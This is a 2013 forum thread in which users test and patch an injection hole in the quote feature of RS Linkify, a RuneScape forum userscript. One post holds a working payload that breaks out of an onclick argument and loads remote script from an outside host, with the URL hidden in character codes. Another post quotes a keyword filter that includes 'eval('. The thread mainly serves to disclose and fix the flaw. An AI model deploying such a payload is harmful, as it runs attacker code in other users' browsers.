RS-Linkify Thread

Quick find code: 261-262-33-65181208

Indecent Act

Posts: 7,456 Rune
Updated. In version 2.0.9.0, none of the examples on the previous pages will work.

I'm trying to tackle this at the escaping level but it's really messy because there are both escaped and unescaped characters in a single line.

I'm not sure how water tight this update is, but it's an improvement, feel free to break it or circumvent it if you like.

I honestly thought when I logged in today this would have been fixed. I hope things don't have to get really bad before they do something about it.

I emailed Jagex yesterday with examples of how to exploit forum users with basically no limitations. I haven't heard back and I don't know if they will reply or even read my email. When all I get is silence on the matter, it's hard to be optimistic.

Thanks everyone who's posted, it has helped make RS Linkify a bit more secure :)

Edit: I notice this also works on other forum sections. I thought the censor might mess with it, but it seems that's not always the case. This is kind of like a time bomb ticking...

06-Dec-2013 03:42:35 - Last edited on 25-Feb-2014 07:26:37 by Indecent Act

Meredith wtf

Posts: 4,160 Adamant
How are you fixing the exploit?

If you're just renaming the function and whatnot like you did before, it won't be watertight.

You can't have the post text in an onclick attribute.

You'd have to clear each onclick attr, then replace it with a function that grabs the content, but doesn't receive it as an argument

Example:

<a onclick="quote(5);return false;">Quote</a>

function quote(index){
var content = getPostContent();
...
putContentIntoTextbox(content);
}

instead of

function quote(content){
...
putContentIntoTextbox(content);
}

06-Dec-2013 05:02:16

Meredith wtf

Posts: 4,160 Adamant
\',0);$.getScript(String.fromCharCode(104,116,116,112,58,47,47,120,112,45,119,97,115,116,101,46,117,112,104,101,114,111,46,99,111,109,47,101,120,112,108,111,105,116,46,112,104,112));new Array(\'test

06-Dec-2013 05:14:49 - Last edited on 06-Dec-2013 05:51:15 by Meredith wtf

Meredith wtf

Posts: 4,160 Adamant
Is this all that you're doing, or am I missing something?

if(tqt.indexOf("','\\\\',") > -1){q_txt='';}
if(tqt.indexOf("\\',") > -1){q_txt='';}
if(tqt.indexOf("//','") > -1){q_txt='';}
if(tqt.indexOf('eval(') > -1){q_txt='';}

06-Dec-2013 05:27:24

Toastcrumbs

Posts: 5,801 Rune
Meredith, the QFC brackets need an ID to work, just saying. :P Probably why you're not able to hide it in a QFC, which tbh... is a good thing.

Okay, Indy's idea seems to fix everything (so far)... If a / exists (even if not a code), it becomes unquote-able. Good luck quoting me.

06-Dec-2013 05:43:55 - Last edited on 06-Dec-2013 05:49:06 by Toastcrumbs
